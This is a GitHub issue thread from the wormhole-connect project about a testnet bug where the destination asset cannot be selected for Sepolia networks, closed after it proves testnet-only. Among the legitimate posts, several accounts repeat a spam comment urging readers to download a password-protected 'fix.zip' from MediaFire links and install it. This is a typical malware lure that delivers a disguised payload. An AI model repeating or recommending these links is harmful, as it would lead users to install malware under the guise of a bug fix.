### ISSUE TITLE
[QA] Cannot select corresponding asset in "To" section when sending asset to Sepolia networks

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#2431]
## Describe the current behavior in detail
Checked on [wormhole-connect-testnet](https://wormhole-connect.netlify.app/?config=N4KABGCmB2BuBcYDkAXSBnF1IqQGnDAFd1IAlSAEwwEsBzaRFAJyMhAF8Qg%3D) (Connect v2) and Google Chrome Version 127.0.6533.120 (Official Build) (arm64).

Steps:
1. Select Fuji network and AVAX asset in "From" section, connect MetaMask wallet
2. Select Base Sepolia/ Optimism Sepolia/ Arbitrum Sepolia/ Sepolia network
3. Check if it is possible to select the AVAX asset

Actual result: Cannot select the asset in "To" section. 
Expected result: It is possible to select an asset in "To" section.

## Notes/ Attachments
![Screenshot 2024-08-26 at 12 23 29](https://github.com/user-attachments/assets/aea16aea-473b-4317-b379-932ae89f9362)

Issue is also reproducible with other networks and assets:
* When CELO asset and Alfajores networks are selected in "From" section 
* When GLMR asset and Moonbase network are selected in "From" section

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by emreboga** [comment]
@tsadovska is this tested in testnet? SDKv2 works in mainnet at this moment. I've tried in the latest deployment and I can select AVAX from multiple networks both source and destination. Can you give it a try?

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tsadovska** [comment]
Closing the ticket, because SDKv2 works in mainnet at this moment.
Original issue is reproducible only in testnet environment. 
Corresponding asset is displayed correctly in "To" section on mainnet.
